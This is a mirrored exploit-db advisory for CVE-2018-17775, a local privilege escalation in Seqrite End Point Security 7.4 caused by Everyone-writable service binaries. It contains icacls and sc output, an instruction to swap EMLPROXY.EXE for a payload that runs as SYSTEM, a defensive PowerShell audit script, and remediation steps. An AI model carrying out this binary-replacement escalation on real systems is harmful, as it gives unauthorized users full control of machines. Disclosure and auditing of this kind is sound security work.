Seqrite End Point Security 7.4 - Privilege Escalation

Published 09 Oct 2018 00:00:00 | Reported by Hashim Jawad | Type: exploitdb | Source: www.exploit-db.com | 474 views

Seqrite End Point Security 7.4 - Privilege Escalation vulnerability on Windows 7 (x64)

Related

Family        Title                                                                                    Published
CNVD          Quick Heal Technologies Seqrite EndPoint Security Elevation of Privilege Vulnerability   10 Oct 2018 00:00
CVE           CVE-2018-17775                                                                           8 Oct 2018 17:00
Cvelist       CVE-2018-17775                                                                           8 Oct 2018 17:00
EUVD          EUVD-2018-9522                                                                           7 Oct 2025 00:30
exploitpack   Seqrite End Point Security 7.4 - Privilege Escalation                                    9 Oct 2018 00:00
NVD           CVE-2018-17775                                                                           8 Oct 2018 17:29
Prion         Code injection                                                                           8 Oct 2018 17:29
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775

# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite"
# with very weak folder permissions: the Everyone group is granted full control ("Everyone: (F)")
# over the directory, its subfolders and their contents. In addition, the program installs a
# handful of services whose binaries live inside that folder and run as "LocalSystem". Provided
# the "Self Protection" feature (enabled by default) has been disabled, which can be done in a
# number of ways (for instance, if the policy does not require the EPS client password to change
# settings, any user can switch it off), a non-privileged user can replace one of those service
# binaries and elevate privileges to "NT AUTHORITY\SYSTEM".

# PoC

c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
                                 Everyone:(CI)(F)
                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Users:(I)(RX)
                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"

[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Core Mail Protection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
c:\>

# Exploit:

Replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot: the "Core Mail Protection" service is AUTO_START and runs as LocalSystem, so the payload starts as NT AUTHORITY\SYSTEM the next time the service is started. A payload that is not a real service executable is terminated by the Service Control Manager once its start timeout expires (error 1053), but it runs as SYSTEM until then, so it should do its work immediately.
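The condition this advisory exploits (a service binary, or its containing directory, writable by a low-privileged principal) is easy to check for across every installed service rather than one "sc qc" and "icacls" at a time. The PowerShell below is an added example written for this page; it is not part of the original advisory or of Seqrite's software. The list of "weak" principals and the set of rights treated as write-class are this example's own assumptions, and the EMLPROXY.EXE path in the comments is only illustrative of the input format.

```powershell
# Added example (not from the advisory): list services whose executable, or the
# directory holding it, grants write-class rights to a low-privileged principal.
# $WeakPrincipals and $WriteMask are assumptions chosen for this example.

$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the caller replace the file or drop a binary beside it.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete)

function Get-ServiceBinaryPath {
    # Extract the executable from a service PathName such as
    #   "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"      (quoted)
    #   C:\Windows\system32\svchost.exe -k netsvcs           (unquoted, no spaces)
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+?\.exe)') { return $Matches[1] }
    return $PathName.Trim()
}

function Test-WeakAcl {
    # Return a description of the first Allow ACE that grants a weak principal
    # write-class rights on $Path, or $null when no such ACE exists.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) {
            return "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
        }
    }
    return $null
}

function Find-WritableServiceBinary {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName } |
        ForEach-Object {
            $exe = Get-ServiceBinaryPath $_.PathName
            # Unquoted paths that contain spaces and trailing arguments are not
            # parsed here; that is the separate unquoted-service-path issue.
            if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { return }
            $fileAce = Test-WeakAcl $exe
            $dirAce  = Test-WeakAcl (Split-Path -Parent $exe)
            if ($fileAce -or $dirAce) {
                [pscustomobject]@{
                    Service   = $_.Name
                    RunsAs    = $_.StartName
                    StartMode = $_.StartMode
                    Binary    = $exe
                    FileAce   = $fileAce
                    DirAce    = $dirAce
                }
            }
        }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

Run it from an ordinary (non-elevated) user session to see exactly what that user could overwrite; a hit with RunsAs = LocalSystem and StartMode = Auto is the situation described above. For the path in this advisory the fix is to strip the explicit Everyone grants from an administrator prompt, for example "icacls "C:\Program Files\Seqrite\Seqrite" /remove:g Everyone /t /c", after which the inherited ACEs leave BUILTIN\Users with read and execute only, and to keep Self Protection enforced by policy so that a standard user cannot switch it off.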

09 Oct 2018 00:00 (current)
Risk: 7.8 (High)
Vulners AI Score: 7.8
CVSS 2: 7.2
CVSS 3: 7.8
EPSS: 0.00182